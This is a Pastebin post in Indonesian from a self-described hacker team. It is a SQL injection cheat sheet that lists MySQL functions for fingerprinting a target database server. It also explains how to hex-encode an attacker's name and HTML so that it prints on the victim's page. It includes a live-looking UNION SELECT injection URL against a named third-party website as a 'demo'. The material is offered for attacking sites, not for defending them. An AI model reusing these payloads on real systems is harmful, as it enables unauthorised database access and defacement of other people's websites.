Advertisement
Versailles

SQL COMMAND AND PRINT INJECTOR NAME [SQL INJECTION]

Aug 4th, 2015
789
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
SQL 1.87 KB | None | 0 0
  1. Assalamulaikum...
  2.  
  3. Dibawah Ini adalah Beberapa Command SQL yang biasa di gunakan injector untuk memperoleh informasi tentang server DATABASE yg digunakan ::
  4.  
  5.  
  6. USER()     :: CURRENT USER
  7.  
  8. DATABASE() :: CURRENT DATABASE
  9.  
  10. version()  :: SQL Version
  11.  
  12. @@version  :: SQL Version
  13.  
  14. schema()   ::  CURRENT DATABASE
  15.  
  16. @@hostname ::  CURRENT Hostname
  17.  
  18. @@tmpdir   ::  Temp Directory
  19.  
  20. @@datadir  ::  DATA Directory
  21.  
  22. @@basedir  :: Base Directory
  23.  
  24. UUID()     :: System UUID KEY
  25.  
  26. system_user()  ::   CURRENT system USER
  27.  
  28. session_user() ::  SESSION USER
  29.  
  30. @@Global.have_symlink  :: Cek Symlink aktif/tidak
  31.  
  32. @@Global.have_ssl      :: Cek pakai SSL/tidak
  33.  
  34. @@CHARACTER_SET_FILESYSTEM :: FILE SYSTEM
  35.  
  36. @@VERSION_COMPILE_OS :: OPERASI SISTEM
  37. ========================================
  38.  
  39.  
  40. == Print name ==
  41.  
  42. Menyelipkan Nama Hacker Saat Nginject..
  43.  
  44. contoh :
  45. nama injector = Verry__D (CONVERT str2hex)
  46. 56657272795f5f44 << ini hasil CONVERT Verry__D ke hex
  47. tambahin 0x sebelum hasil CONVERT ke hexa..
  48. jadi :: 0x56657272795f5f44
  49.  
  50. Print Nama Injector dan Versi :: concat(0xStringYgSudahDiConvertKeHex,version())
  51.  
  52. contoh :
  53. concat(0x56657272795f5f44,version())
  54.  
  55. Print Nama Injector dan versi dgn warna  (memasukkan tag HTML)..
  56.  
  57. concat(0x<font color=red>Injected BY Verry ::</font>,version())
  58.  
  59. CONVERT ke hex
  60. <font color=red>Injected BY Verry ::</font>
  61.  
  62. contoh ::
  63. concat(0x3c666f6e7420636f6c6f723d7265643e496e6a6563746564206279205665727279203a3a3c2f666f6e743e,version())
  64.  
  65. Demo ::
  66. http://www.quentinlangley.net/article.php?ex=1&id=418+AND+FALSE+UNION+SELECT+1,2,concat(0x3c666f6e7420636f6c6f723d7265643e496e6a6563746564206279205665727279203a3a3c2f666f6e743e,version()),4,5,6,7,8--
  67.  
  68. kreasikan Query mu :D
  69.  
  70. thanks FOR Team Sec7or , rdot.org ,Hackforum , Securityidiots AND ALL injector :)
  71.  
  72. Wassalamualaikum...
  73.  
  74.  
  75. ./Versailles
  76. ( Team Sec7or - Java Cyber Army )
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement